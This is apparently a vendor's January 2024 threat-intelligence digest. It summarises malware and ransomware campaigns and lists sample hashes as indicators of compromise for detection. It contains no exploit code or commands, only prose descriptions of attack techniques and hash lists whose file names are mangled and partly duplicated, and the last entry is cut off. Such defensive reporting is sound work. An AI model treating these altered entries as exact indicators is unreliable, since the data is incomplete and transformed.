Here is the January 2024 breakdown of threats with a short list of IoCs. The full IoC list for each specific threat is available from the Cymulate app.
Reminder: The Cymulate BAS Immediate Threat capabilities can be configured to automatically update your SIEM list of IoCs, including hashes, URLs, domain names, etc.
Note: The period character ‘.’ in the hash names has been replaced with a ‘·’ out of an abundance of security caution.
Info Stealing Packages Hidden In PyPI
FortiGuard Labs has identified new variants of Whitesnake PE malware that target Windows users and institutions and suggests they may also be carrying out a similar attack on the Python Package Index (PyPI).
Sample IoCs
03a1621af484ff8f5c1_browsing797b25426bab656b6731dba43e31fe58fc1f1963d8484XxX1Exe·exe
MD5: a7705bd4f706a10bc301f126363c329e
SHA1: aae3eef0e7e98d7ca74b3a9feebd50ddfa9e87c2
SHA256: 03a1621af484ff8f5c1797b25426bab656b6731dba43e31fe58fc1f1963d8484
2b61_browsing7277fc551b7500867ee009a0f80cbe6d5ee729bdfbf9b4f9d52164811082XxX5Exe·exe
MD5: 1b7f78233f9f5fc354c60ed4c3c925e2
SHA1: f15863f7ae387a8fe5496d1bc833dad526ad38b6
SHA256: 2b617277fc551b7500867ee009a0f80cbe6d5ee729bdfbf9b4f9d52164811082
34e5bd6_browsing7fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8XxX6Exe·exe
MD5: 0a32e2ec770c67261df3f3971d517bea
SHA1: 4dfbe7f3faa5b30b9f93085572496f055b02c5e0
SHA256: 34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8
CherryLoader A New Go-based Loader Discovered in Recent Intrusions
Arctic Wolf Labs has been tracking two recent intrusions where threat actors leveraged a new Go-based malware downloader we are calling CherryLoader that allowed them to swap exploits without recompiling code. The loaders icon and name masqueraded as the legitimate CherryTree note taking application to trick the victims. In the intrusions we investigated CherryLoader was used to drop one of two privilege escalation tools PrintSpoofer or JuicyPotatoNG which would then run a batch file to establish persistence on the victim device.
Sample IoCs
50f_browsing7f8a8d1bd904ad7430226782d35d649e655974e848ff58d80eafedd377ee9XxX1Exe·exe
MD5: 03ac133c53c249d6392a104cff70c50f
SHA1: 81852d04bb5bea2a5ee2606d1c9df4165f0a1085
SHA256: 50f7f8a8d1bd904ad7430226782d35d649e655974e848ff58d80eafedd377ee9
8c42321dd19bf4c8d2ef11885664e_browsing79b0064194e3222d73f00f4a1d67672f7fcXxX3Exe·exe
MD5: aee80cf052be5aa6b7af312b1b168ddf
SHA1: 0573e10886b3fd1c9d6f0e2eec4a00a7db02a931
SHA256: 8c42321dd19bf4c8d2ef11885664e79b0064194e3222d73f00f4a1d67672f7fc
438c_browsing7ef49fbadd67bf809f7e3e239557e1d18d4c80e42c57f9479a89e3672fd9XxX10Bat·bat
MD5: 85b1ed8dec41ac515865f5ce635feaba
SHA1: bd7a7cf6ea6da7761646ea865303b67ca3037e8d
SHA256: 438c7ef49fbadd67bf809f7e3e239557e1d18d4c80e42c57f9479a89e3672fd9
Kasseika Ransomware Deploys BYOVD Attacks Abuses PsExec and Exploits Martini Driver
Following an increase in bring-your-own-vulnerable-driver (BYOVD) attacks launched by ransomware groups in 2023 the Kasseika ransomware is among the latest groups to take part in the trend. Kasseika joins Akira BlackByte and AvosLocker in using the tactic that allows threat actors to terminate antivirus processes and services for the deployment of ransomware.
In this case we investigated the Kasseika ransomware abused Martini driver to terminate the victim machines antivirus-related processes.
Sample IoCs
22f8fa1b42e48_browsing7f6f6d6c6a62bba65267e2d292f80989031f8529558c86a9119XxX17Exe·exe
MD5: e0bac7cc1e2b02dda06b8a09f07abee6
SHA1: e7bf904f19581c7eebbbe06f997c3b3f7c1b7739
SHA256: 22f8fa1b42e487f6f6d6c6a62bba65267e2d292f80989031f8529558c86a9119
ae635a4dd36a2bf_browsing7047b6a63605a9d20aae4bcc313d93068e5e0b6676a32a39fXxX18Exe·exe
MD5: c98a5a4bfd53c87c5aac5659f7f505c1
SHA1: 82110672dbde14a73aca43e15e4c85291fe1606f
SHA256: ae635a4dd36a2bf7047b6a63605a9d20aae4bcc313d93068e5e0b6676a32a39f
8a0cd4fb3542458849e20c54_browsing7a684578dd7fdd4317021dacf5517f607f8ceea7XxX19Bat·bat
MD5: fdc816fb3d92e02c75f65b1372861f27
SHA1: 78f86e7248492797101cb8e922f1f5e7f542d99f
SHA256: 8a0cd4fb3542458849e20c547a684578dd7fdd4317021dacf5517f607f8ceea7
Cactus Ransomware
On January 20th the Cactus ransomware group attacked a number of victims across varying industries. The attacks were disclosed on their leak site with the accompanying victim data.
The ransomware group has routinely put pressure on victims by releasing personal information about employees of the victim organization; this has included drivers licenses passports pictures and other personal identification.
Sample IoCs
9ec6d3bc0_browsing7743d96b723174379620dd56c167c58a1e04dbfb7a392319647441aXxX73Exe·exe MD5: 5737cb3a9a6d22e957cf747986eeb1b3
SHA1: 11a93a6c270d6d189fa857f03a001b347a679654
SHA256: 9ec6d3bc07743d96b723174379620dd56c167c58a1e04dbfb7a392319647441a
c49b4faa6ac_browsing7b5c207410ed1e86d0f21c00f47a78c531a0a736266c436cc1c0aXxX74Exe·exe
MD5: ef6a62e5ef88cdcc946e8edafe7a2184
SHA1: ceef6e8328be6b859ee9ba9e5cb194ad12c9483c
SHA256: c49b4faa6ac7b5c207410ed1e86d0f21c00f47a78c531a0a736266c436cc1c0a
9ec6d3bc0_edr7743d96b723174379620dd56c167c58a1e04dbfb7a392319647441aXxX73Exe·exe
MD5: 5737cb3a9a6d22e957cf747986eeb1b3
SHA1: 11a93a6c270d6d189fa857f03a001b347a679654
SHA256: 9ec6d3bc07743d96b723174379620dd56c167c58a1e04dbfb7a392319647441a
TeamCity Intrusion Saga APT29 Suspected Among the Attackers Exploiting CVE-2023-42793
On September 6 2023 researchers from Sonar discovered a critical TeamCity On-Premises vulnerability (CVE-2023-42793) issue. TeamCity is a build management and continuous integration server from JetBrains. On September 27 2023 a public exploit for this vulnerability was released by Rapid7. This critical vulnerability was given a CVE score of 9.8 most likely because an attacker can deploy the publicly available exploit without authentication supporting remote code execution on the victim server using a basic web request to any accessible web server hosting the vulnerable application.This vulnerability has been observed being actively exploited in the wild and was added to CISAs Known Exploited Vulnerabilities Catalog on October 4 2023.
Sample IoCs
ebe231c90fad02590fc56d5840acc63b90312b0e2fee_browsing7da3c7606027ed92600eXxX84Dll·dll
MD5: 23448eba3f5f7267b810080bcb04110f
SHA1: 5ce062f210e1a5026cb53e9949865312ee477e3c
SHA256: ebe231c90fad02590fc56d5840acc63b90312b0e2fee7da3c7606027ed92600e
7b666b9_browsing78dbbe7c032cef19a90993e8e4922b743ee839632bfa6d99314ea6c53XxX86Dll·dll
MD5: 2f383f7785f187c93f62fda035ffe587
SHA1: 3a32e516c037c37f7bf83171e167511ba53870a7
SHA256: 7b666b978dbbe7c032cef19a90993e8e4922b743ee839632bfa6d99314ea6c53
4ee_browsing70128c70d646c5c2a9a17ad05949cb1fbf1043e9d671998812b2dce75cf0fXxX87Zip·zip
MD5: 5a782bc5f0d63540b666f6a07e116d81
SHA1: 281bb0dadc789b89f7ae30d5f4bdeae57c66b0e1
SHA256: 4ee70128c70d646c5c2a9a17ad05949cb1fbf1043e9d671998812b2dce75cf0f
Enter The Gates An Analysis of the DarkGate AutoIt Loader
DarkGate is one of the malware that uses Auto-It compiled loaders that poses a significant threat due to its sophisticated evasion techniques and persistence within compromised systems.
The malware employs multi-stage payloads and leverages obfuscated AutoIt scripting complicating its identification through traditional signature-based methods. Its ability to exfiltrate sensitive data and establish command and control communications demands vigilant detection and analysis.
Sample IoCs
8b6c6c00_browsing7efa8e1a7da241564142f8a8a934dcce451c7e522cdd86292e81ead7XxX89Msi·msi
MD5: 1170e2b02b92895d9db0be336d032d90
SHA1: 18f49619d69b057e81163bdf08eab5f355ce662c
SHA256: 8b6c6c007efa8e1a7da241564142f8a8a934dcce451c7e522cdd86292e81ead7
7a92489050089498d6ec05fb_browsing7bdfad37da13bb965023d126c41789c5756e4e02XxX90Msi·msi
MD5: a0e0687c1f4e8f50243db910ebf2e623
SHA1: 72629d1d68dbfb601cc8390d642ad7a1289fb946
SHA256: 7a92489050089498d6ec05fb7bdfad37da13bb965023d126c41789c5756e4e02
725_browsing7b4ccec0ceb27b6fb141ce12c8dfb8a401d3edfaeca12699561eccda5a23eXxX91Pdf·pdf
MD5: 22ae72dd478b95daf3a8ac8c5216ceac
SHA1: 461b54ab5fcfc6f79ace57f76b9645b67bc500bb
SHA256: 7257b4ccec0ceb27b6fb141ce12c8dfb8a401d3edfaeca12699561eccda5a23e
Zloader No Longer Silent in the Night
After an almost two-year hiatus Zloader reemerged with a new iteration that appears to have started development in September 2023. These new changes include new obfuscation techniques an updated domain generation algorithm (DGA) RSA encryption for network communications and the loader now has native support for 64-bit versions of Windows.
Sample IoCs
03848_browsing7af6226adef21a29f3d31baf3c809140fcb408191da8bc457b6721e3a55XxX74Exe·exe
MD5: a58aaa24f417bee90ff01865d81866c5
SHA1: 053849d280c4eadcc1d8d2b6fccc821b0ccd2f4e
SHA256: 038487af6226adef21a29f3d31baf3c809140fcb408191da8bc457b6721e3a55
16af920dd49010cf29_browsing7b03a732749bb99cc34996f090cb1e4f16285f5b69ee7dXxX75Exe·exe
MD5: 71c72ad0da3af2fca53a729ef977f344
SHA1: 7ace68f544299d8195eabc3e3f71e548eca51e47
SHA256: 16af920dd49010cf297b03a732749bb99cc34996f090cb1e4f16285f5b69ee7d
25c8f98b_browsing79cf0bfc00221a33d714fac51490d840d13ab9ba4f6751a58d55c78dXxX76Exe·exe
MD5: 2f6fcc4884dfa21ee48e463a7a1963f5
SHA1: 2090c12960dee091681a7a3d334d54f2dd6d0bf2
SHA256: 25c8f98b79cf0bfc00221a33d714fac51490d840d13ab9ba4f6751a58d55c78d
Surfing the Tidal Waves of HR-Themed Spam Emails
Fraudsters are pretending to be HR representatives and sending malicious emails with links that lead to phishing sites or attachments that can download malware. Over the past six months researchers have seen a notable increase in HR-related malicious spam which is expected to continue.
Sample IoCs
6d882194b19099_browsing750bcc83c0df6acffc06d020d8937ad9cd6136913e0c6dc089XxX10Vbe·vbe
MD5: 67b7b52e818256c024ba7704f5e1fc8d
SHA1: 5cd4d3df766ba529d158f4f73729c26428a63261
SHA256: 6d882194b19099750bcc83c0df6acffc06d020d8937ad9cd6136913e0c6dc089
dc19c_browsing7c20d6dc9f157905de4739e7d83954ba1594dae95cc000d8b523b2e53ecXxX117z·7z
MD5: c8c95a6a387113ef7117097bdc75b6e8
SHA1: 15599559dd5c4c76d0eeca3277a45260f8a52662
SHA256: dc19c7c20d6dc9f157905de4739e7d83954ba1594dae95cc000d8b523b2e53ec
6d882194b19099_edr750bcc83c0df6acffc06d020d8937ad9cd6136913e0c6dc089XxX10Vbe·vbe
MD5: 67b7b52e818256c024ba7704f5e1fc8d
SHA1: 5cd4d3df766ba529d158f4f73729c26428a63261
SHA256: 6d882194b19099750bcc83c0df6acffc06d020d8937ad9cd6136913e0c6dc089
LockBit Ransomware Distributed Via Word Files Disguised as Resumes
AhnLab SEcurity intelligence Center (ASEC) has identified that LockBit ransomware is being distributed via Word files since last month.
Sample IoCs
2505d5a0b391150f5aa6e18e03_browsing75ea8ef4d022840ecd499ca4b6b487a6e86de2XxX1Docx·docx
MD5: 11a65e914f9bed73946f057f6e6aa347
SHA1: 3d0a20cd4c99c3f08a405fd57cebfde48d7a2923
SHA256: 2505d5a0b391150f5aa6e18e0375ea8ef4d022840ecd499ca4b6b487a6e86de2
35ee311e2e4b1966d3964a61f8e05cd9b6b0e605dd34e64e6ad5d8c53bba908a_browsingXxX2Docx·docx
MD5: 16814dffbcaf12ccb579d5c59e151d16
SHA1: 6da093d9d87593496af83967dd97e2975a945ba6
SHA256: 35ee311e2e4b1966d3964a61f8e05cd9b6b0e605dd34e64e6ad5d8c53bba908a
95_browsing7baea98c48a7e8f620b6ad869113eacbc4f14c73e03bf5f9dbc75881e22aedXxX3Docx·docx
MD5: 1b95af49b05953920dbfe8b042db9285
SHA1: 57324c29bd4ece81b9578972d5a4a47bcf8cf408
SHA256: 957baea98c48a7e8f620b6ad869113eacbc4f14c73e03bf5f9dbc75881e22aed
From Russia With Code Disarming Atomic Stealer
The latest version of Atomic Stealer is circulating on the Internet and has been described as one of the most sophisticated tools in the world by Jrme Segura a security researcher. For 3000$ per month the user gets the access to the panel. The user provides Telegram Bot ID and build ID to the seller and the user receives the build.
Sample IoCs
339ac8f_browsing76d26a01d1d79c4dbe3e17b27dbba6a8a8ee3c277768017486e9db030XxX241Macho·mach
MD5: 57db36e87549de5cfdada568e0d86bff
SHA1: b8352f14d2b79dc865dd7ae60d47d901847f0f35
SHA256: 339ac8f76d26a01d1d79c4dbe3e17b27dbba6a8a8ee3c277768017486e9db030
589dbb3f6_browsing78511825c310447b6aece312a4471394b3bc40dde6c75623fc108c0XxX242Macho·macho
MD5: bf7512021dbdce0bd111f7ef1aa615d5
SHA1: ea8b0d95924605292f994810103ee95b9cc37914
SHA256: 589dbb3f678511825c310447b6aece312a4471394b3bc40dde6c75623fc108c0
bd8adfae24dc_browsing7a6b633d3b5342d11978e6b7418fa43be6eca0378f17d0bb7565XxX243Macho·macho
MD5: dd8aa38c7f06cb1c12a4d2c0927b6107
SHA1: 863c0fbc1efccbef4c2df82920ded53181096d8e
SHA256: bd8adfae24dc7a6b633d3b5342d11978e6b7418fa43be6eca0378f17d0bb7565
Ivanti Connect Secure VPN Exploitation New Observations
Analysis of Ivanti Connect Secure VPN appliances from January 2023 to January 18 2024 has revealed a number of new discoveries and new ways of exploiting the networks vulnerabilities.
Sample IoCs
39ead6055306_browsing739ab969a3531bde2050f556b05e500894b3cda120178f2773beXxX110So.so
MD5: 001dfa92e6239c3dda0935634c1e20d1
SHA1: f9a33d6c1798523248a88d6b45215001cbae3441
SHA256: 39ead6055306739ab969a3531bde2050f556b05e500894b3cda120178f2773be
816_browsing754f6eaf72d2e9c69fe09dcbe50576f7a052a1a450c2a19f01f57a6e13c17XxX111So·so
MD5: 63b0574cbe77d6231513f32e0d042484
SHA1: 55c2197c88cd3cef23b5f9062c6bdbb6f4b28094
SHA256: 816754f6eaf72d2e9c69fe09dcbe50576f7a052a1a450c2a19f01f57a6e13c17
45c95_browsing78bbceb2ce2b0f10133d2f3f708e78c8b7eb3c52ad69d686e822f9aa65fXxX116Json·json
MD5: f861461b3b29a9eb97750b1b0af6e9de
SHA1: 02fe1d807c689072914ce43d894d2b70e0207639
SHA256: 45c9578bbceb2ce2b0f10133d2f3f708e78c8b7eb3c52ad69d686e822f9aa65f
A Victim of Mallox Ransomware
In a blog post, researchers share insights into the tactics and procedures used by the Mallox ransomware threat actor to extort money from victims to pay for their services.
Sample IoCs
0e05b8d0a88660c00510abde3aade43291e_browsing774880ed001e3a88dbb753dcb6f52XxX58Bat·bat
MD5: 6055dd496a062d452e9f64f0a24ae9e3
SHA1: 6aa2d53b0d25eb6ae0d91ead04c7d5de5997438a
SHA256: 0e05b8d0a88660c00510abde3aade43291e774880ed001e3a88dbb753dcb6f52
5_browsing72d88c419c6ae75aeb784ceab327d040cb589903d6285bbffa77338111af14bXxX56Exe·exe
MD5: bb7c575e798ff5243b5014777253635d
SHA1: 2146f04728fe93c393a74331b76799ea8fe0269f
SHA256: 572d88c419c6ae75aeb784ceab327d040cb589903d6285bbffa77338111af14b
0e05b8d0a88660c00510abde3aade43291e_edr774880ed001e3a88dbb753dcb6f52XxX58Bat·bat
MD5: 6055dd496a062d452e9f64f0a24ae9e3
SHA1: 6aa2d53b0d25eb6ae0d91ead04c7d5de5997438a
SHA256: 0e05b8d0a88660c00510abde3aade43291e774880ed001e3a88dbb753dcb6f52
Kuiper Ransomwares Evolution
The Kuiper ransomware developed in Golang is presented as an opportunity for criminals to profit by extorting one or more targets. The actor RobinHood offers assistance with operations in exchange for a percentage of the victims payment. Despite an initial promising advertisement highlighting technical capabilities the reality reveals that the actor may have overestimated their capabilities. Stairwells Silas Cutlers blog exposes the actors setbacks including obtaining a server copy with the ransomwares source code and decryption keys.
Sample IoCs
df430ab9f5084a3e62a6c9_browsing7c6c6279f2461618f038832305057c51b441c648d9XxX5Exe.exe
MD5: 84820f3eb491a2fde1f52435cd29646c
SHA1: 8c6e135495fcf8898de62e6793e3cd06d3025461
SHA256: df430ab9f5084a3e62a6c97c6c6279f2461618f038832305057c51b441c648d9
0162641163a30a2edff_browsing787eeecc733ab1de46f03e213743dc768d39eb3075985XxX11Exe·exe
MD5: 0608c64c57dcc09246be00f0b2767e6e
SHA1: 02642663bfc7be0c06051f4b01c9861102c71850
SHA256: 0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985
99834_browsing7d4ba21661688169337ca4ea2a6118c2fad2005d39d8bf46c0bcf46af5aXxX7Elf·elf
MD5: 8c3c50ecee8744ad77a517ed39a25880
SHA1: 27abd80487784e41d2dd7eee9efd5b8b01712ec7
SHA256: 998347d4ba21661688169337ca4ea2a6118c2fad2005d39d8bf46c0bcf46af5a
US Cert Alert – Known Indicators of Compromise Associated with Androxgh0st Malware
Androxgh0st malware has been observed establishing a botnet for victim identification and exploitation in target networks.
Sample IoCs
0df1_browsing7ad20bf796ed549c240856ac2bf9ceb19f21a8cae2dbd7d99369ecd317efXxX1Php·php
MD5: 95f745a5db131b1ca34e44848fd52edb
SHA1: 5fae94432540ade68eabce94140c9a5be153b3c8
SHA256: 0df17ad20bf796ed549c240856ac2bf9ceb19f21a8cae2dbd7d99369ecd317ef
59e90be_browsing75e51c86b4b9b69dcede2cf815da5a79f7e05cac27c95ec35294151f4XxX3Html·html
MD5: 1fb78440dc44b0900b27260a16d9771e
SHA1: 452ec481734a78597b928e29c834d0e43fb2c7e2
SHA256: 59e90be75e51c86b4b9b69dcede2cf815da5a79f7e05cac27c95ec35294151f4
https://www.virustotal.com/gui/file/1fb78440dc44b0900b27260a16d9771e/detection
23fc51fde90d98daee2_browsing7499a7ff94065f7ed4ac09c22867ebd9199e025dee066XxX2So·so
MD5: 62a06bea8c6e276b5e532944cfc863e5
SHA1: 09bd9b17a64b20ba66582dbc3ce08169697177a8
SHA256: 23fc51fde90d98daee27499a7ff94065f7ed4ac09c22867ebd9199e025dee066
Rimasuta New Variant Switches to ChaCha20 Encryption Algorithm
A new variant of the Mirai malware known as Rimasuta has recently resurfaced in samples captured by 360netlab in Japan but has undergone a significant change in its encryption algorithm.
Sample IoCs
40bbd8113863f62f6bba3c_browsing7d6a93ad96062891b53fc79d027109c12d1acfaccbXxX11Elf·elf
MD5: cb19cd9472032c2dd5985f699e48188e
SHA1: 9352740811729cbac88116b2e2a92833c9bee4a2
SHA256: 40bbd8113863f62f6bba3c7d6a93ad96062891b53fc79d027109c12d1acfaccb
2_browsing72731119f7b60979edbd0abc939e8156988d9fd58be24b5a47964e7e5ad3ca2XxX10Elf·elf
MD5: cc1c4ca4c1b98fc0aabac0c35d478c4a
SHA1: 8e1beb77b33497d5d8076ebdb68e5ac002cca7c3
SHA256: 272731119f7b60979edbd0abc939e8156988d9fd58be24b5a47964e7e5ad3ca2
2_edr72731119f7b60979edbd0abc939e8156988d9fd58be24b5a47964e7e5ad3ca2XxX10Elf·elf
MD5: cc1c4ca4c1b98fc0aabac0c35d478c4a
SHA1: 8e1beb77b33497d5d8076ebdb68e5ac002cca7c3
SHA256: 272731119f7b60979edbd0abc939e8156988d9fd58be24b5a47964e7e5ad3ca2
CVE-2023-36025 Exploited for Defense Evasion in Phemedrone Stealer Campaign
Trendmicro covers Phemedrone Stealer campaigns exploitation of CVE-2023-36025 the Windows Defender SmartScreen Bypass vulnerability for its defense evasion and investigates the malwares payload.
Sample IoCs
1433efd14200_browsing7ce809aff5b057810f5a1919ea1e3ff740ff0fcc2fc729226be5XxX42Ini·ini
MD5: 65367d9e4f93700cdeab9af35559220e
SHA1: 0a6f7c08ccdadbc07e25957693846c06eaa1b093
SHA256: 1433efd142007ce809aff5b057810f5a1919ea1e3ff740ff0fcc2fc729226be5
4ae28a44c38edc516e449ddd269b5aa9924d549d_browsing763773dcd312b48fe6bb91abXxX54Ini·ini
MD5: b6627a1ba0ff5b3352990518bda0f2d5
SHA1: 0847210bde9109b855a313ba4cf8f38a8a2c07d2
SHA256: 4ae28a44c38edc516e449ddd269b5aa9924d549d763773dcd312b48fe6bb91ab
c6_browsing765d92e540af845b3cbc4caa4f9e9d00d5003a36c9cb548ea79bb14c7e8f66XxX36Dll·dll
MD5: b042b2a8981a94b7afe680d94808e9f8
SHA1: 52e8602e9137b2e02802512be143bb537cb8d56e
SHA256: c6765d92e540af845b3cbc4caa4f9e9d00d5003a36c9cb548ea79bb14c7e8f66
Medusa Ransomware Continues To Infect Devices Worldwide
In 2023, the Medusa ransomware targeted devices across various sectors.
The operators exploited Microsoft Exchange Servers by uploading a webshell similar to previously reported ASPX files. Subsequently, PowerShell was used to execute a bitsadmin transfer from the file hosting site filemail[.]com downloading a ZIP-compressed file named baby.zip. Upon decompression and execution, this file installed ConnectWise remote monitoring and management (RMM) software.
Sample IoCs
7d68da8aa_browsing78929bb467682ddb080e750ed07cd21b1ee7a9f38cf2810eeb9cb95XxX77Exe·exe
MD5: e4b7fdabef67a0550877e6439beb093d
SHA1: 042ce9ab1afe035e0924753f076fcb20de0d1a1d
SHA256: 7d68da8aa78929bb467682ddb080e750ed07cd21b1ee7a9f38cf2810eeb9cb95
9144a60ac86d4c91f_browsing7553768d9bef848acd3bd9fe3e599b7ea2024a8a3115669XxX71Exe·exe
MD5: a57f84e3848ab36fd59c94d32284a41e
SHA1: 4d5992de4601c4306885c71b0ba197184bb69221
SHA256: 9144a60ac86d4c91f7553768d9bef848acd3bd9fe3e599b7ea2024a8a3115669
736de_browsing79e0a2d08156bae608b2a3e63336829d59d38d61907642149a566ebd270XxX69Exe·exe
MD5: 47386ee20a6a94830ee4fa38b419a6f7
SHA1: ee4575cf9818636781677d63236d3dc65652deab
SHA256: 736de79e0a2d08156bae608b2a3e63336829d59d38d61907642149a566ebd270
Cert IL Alert – DJVU Ransomware
Cert IL issued a warning about the increased use of DJVU Ransomware against targets in Israel.
Sample IoCs
83546201db335f52_browsing721ed313b9078de267eaf1c5d58168b99e35b2836bf4f0fcXxX2Exe·exe
MD5: b8dc3028562df4c7d77306ab31778bd6
SHA1: dc0b2aa06d1c5e472060fd0eea07c89d093b9abc
SHA256: 83546201db335f52721ed313b9078de267eaf1c5d58168b99e35b2836bf4f0fc
8d_browsing7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0XxX4Exe·exe
MD5: 9ead10c08e72ae41921191f8db39bc16
SHA1: abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256: 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
3d9cf22_browsing7ef3c29b9ca22c66359fdd61d9b3d3f2bb197ec3df42d49ff22b989a4XxX3Exe·exe
MD5: 37b6aab56a0f770ce58a670322361a1c
SHA1: 87606604cdaa89b93d4d1b5e3e12f5ec24f60016
SHA256: 3d9cf227ef3c29b9ca22c66359fdd61d9b3d3f2bb197ec3df42d49ff22b989a4
Mirai Zombie Network Variant Aquabot Analysis
Recently Antiy CERT captured a new variant of the Mirai zombie network targeting various architectures such as MIPS ARM and X86. It infects targets using weak passwords and waits for control commands to execute DDoS attacks.
Sample IoCs
8f9ba_browsing77dd02762aa6b95c65716c759d300f492d1fa572739750e50a78658c968XxX14Elf·elf
MD5: 14c46c7f8f8185793bef4f919c24dc05
SHA1: d73f64ec3e69252a3f91b48dc8729af5d92ef4f8
SHA256: 8f9ba77dd02762aa6b95c65716c759d300f492d1fa572739750e50a78658c968
14089ffd01f6b565f66bfe9e9a_browsing708e4376865c6c4407a1f4d16d50198a0bb8e3XxX11Elf·elf
MD5: a06b5be74af6d4a8bb534dce0e4d8960
SHA1: 1db201f4c491d0cb90fe95cb3e1dfa8e0975cfbd
SHA256: 14089ffd01f6b565f66bfe9e9a708e4376865c6c4407a1f4d16d50198a0bb8e3
6d6db580b0f_browsing7853421c7523f7a2f4696d98f9251d950466e9c070e51817f48f7XxX24Elf·elf
MD5: 8ffd26c19f4890863d0f969d04f38f5b
SHA1: 781c5af0c941aafd324a94ad2fe7dee62baffb46
SHA256: 6d6db580b0f7853421c7523f7a2f4696d98f9251d950466e9c070e51817f48f7
New Returgence Attack Campaign Turkish Hackers Target Mssql Servers To Deliver Domain-Wide Mimic Ransomware
The Securonix Threat Research team has been monitoring an ongoing threat campaign RETURGENCE which involves the targeting and exploitation of MSSQL database servers to gain initial access. The threat actors appear to be targeting US EU and LATAM countries and are financially motivated.
Sample IoCs
d0c1662ce239e4d288048c0e3324ec52962f6ddda_browsing77da0cb7af9c1d9c2f1e2ebXxX1Exe·exe
MD5: 6a58b52b184715583cda792b56a0a1ed
SHA1: 3477a173e2c1005a81d042802ab0f22cc12a4d55
SHA256: d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb
1c_browsing7b82b084da8b57ffeef7bdca955c2aa4a209a96ec70e8d13e67283c10c12a5XxX3Exe·exe
MD5: 19b33fe99bcd5040034e96bec2023e0d
SHA1: 64a01d3d666ec101e059174905837e0bde9e98e3
SHA256: 1c7b82b084da8b57ffeef7bdca955c2aa4a209a96ec70e8d13e67283c10c12a5
31feff32d23_browsing728b39ed813c1e7dc5fe6a87dcd4d10aa995446a8c5eb5da58615XxX5Exe·exe
MD5: 57850a4490a6afd1ef682eb93ea45e65
SHA1: 338d147711c56e8a1e75e64a075e5e2984aa0c05
SHA256: 31feff32d23728b39ed813c1e7dc5fe6a87dcd4d10aa995446a8c5eb5da58615
Atomic Stealer rings in the new year with updated version
It looks like Atomic Stealer was updated around mid to late December 2023, where its developers introduced payload encryption in an effort to bypass detection rules. Some samples from crack websites made their way to VirusTotal around that time frame, followed by a malvertising campaign we observed in January 2024.
Sample IoCs
18bc9_browsing7e3f68864845c719754d2d667bb03f754f6e87428e33f9c763a8e6a704aXxX1Dmg·dmg
MD5: 8a2f7bacd04659f0d838e5b6c892b962
SHA1: e40275b896afac76171183d27b52913c541013a6
SHA256: 18bc97e3f68864845c719754d2d667bb03f754f6e87428e33f9c763a8e6a704a
18bc9_edr7e3f68864845c719754d2d667bb03f754f6e87428e33f9c763a8e6a704aXxX1Dmg·dmg
MD5: 8a2f7bacd04659f0d838e5b6c892b962
SHA1: e40275b896afac76171183d27b52913c541013a6
SHA256: 18bc97e3f68864845c719754d2d667bb03f754f6e87428e33f9c763a8e6a704a
Threat Actors Target Lucrative Information By Distributing Lumma Stealer Via Compromised YouTube Accounts
The threat actor utilizes YouTube to spread Lumma stealer variant by luring potential victims with deceptive adds for cracked software content. They employ shortened URL services like TinyURL sand Cuttly to dece victims into clicking the malicious URL. The victims downloads a ZIP file containing a malicious LNK file which downloads a .Net loader that subsequently drops the malicious final payload that targets sensitive information such as user credentials system details browser data and extensions. Additionally the malware employs anti-VM and anti-debugging functions to evade detection.
Sample IoCs
01a23f8f59455eb9_browsing7f55086c21be934e6e5db07e64acb6e63c8d358b763dab4fXxX215Exe·exe
MD5: 6d07e04a6926d1dd6cc7805f866114a4
SHA1: 55dd745220a09fe110ed6f92fc883b566ba7f47a
SHA256: 01a23f8f59455eb97f55086c21be934e6e5db07e64acb6e63c8d358b763dab4f
4836_browsing72a00ea676236ea423c91d576542dc572be864a4162df031faf35897a532XxX217Lnk·lnk
MD5: 757661287c20b63b1c6ae4f66fc0c6d8
SHA1: c22bbfca22798c9505e311bc1fcc417b8f7ae272
SHA256: 483672a00ea676236ea423c91d576542dc572be864a4162df031faf35897a532
01a23f8f59455eb9_edr7f55086c21be934e6e5db07e64acb6e63c8d358b763dab4fXxX215Exe·exe
MD5: 6d07e04a6926d1dd6cc7805f866114a4
SHA1: 55dd745220a09fe110ed6f92fc883b566ba7f47a
SHA256: 01a23f8f59455eb97f55086c21be934e6e5db07e64acb6e63c8d358b763dab4f
Raspberry Robin – Global USB Malware Campaign
This USB malware is not like your usual VBS self-copying low-grade stuff it is more like the BadUSB campaigns from a few years ago that were reportedly linked to FIN7 and led to BlackMatter or REvil ransomare. Microsofts report on Raspberry Robin was the first to reveal that RaspberryRobin is also leading to multiple other top-tier malware loaders such as SocGholish IcedID Bumblebee and Truebot which are all well-known ransomware precursor families. Raspberry Robin has shown itself to be an emerging player in the big game hunting ransomware ecosystem. USB malware has proven to be an old yet still effective method to establish an initial foothold inside target environments.
Sample IoCs
8cc69_browsing700d007da11ee29a37d9accd87be1e9b16c49e8d8015b4cc237de803e24XxX1Lnk·lnk
MD5: 1dc4a96b34323ee26830091029ad3552
SHA1: 864d75f8ea0a369a58b478db3dd03927cd983078
SHA256: 8cc69700d007da11ee29a37d9accd87be1e9b16c49e8d8015b4cc237de803e24
de62ea5d304259d153101e488449afb51f536a2c65082f929d298939de129355_browsingXxX2Txt·txt
MD5: 52e5b7116f7d77be75888ad91395479d
SHA1: 003b4bcacccadff7b68831c4991c3c04d630dc59
SHA256: de62ea5d304259d153101e488449afb51f536a2c65082f929d298939de129355
1c8b93c05c58886a9edbf2818a2cc6bcc06f003b8919f_browsing76f7c0af6a9602bea35XxX3Unkn·unkn
MD5: db93f64e469fa0a65000ec9eee3a9e18
SHA1: efb8e9e1ff37693cfbe6549fe9092a93ac7704a2
SHA256: 1c8b93c05c58886a9edbf2818a2cc6bcc06f003b8919f76f7c0af6a9602bea35
Kaspersky Crimeware Report FakeSG Akira And AMOS
Kaspersky has published a series of reports on new cross-platform ransomware malware distribution campaigns and the AMOS stealer, which it describes as the FakeSG campaign.
Sample IoCs
4d24b3591_browsing76389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87XxX89Exe·exe
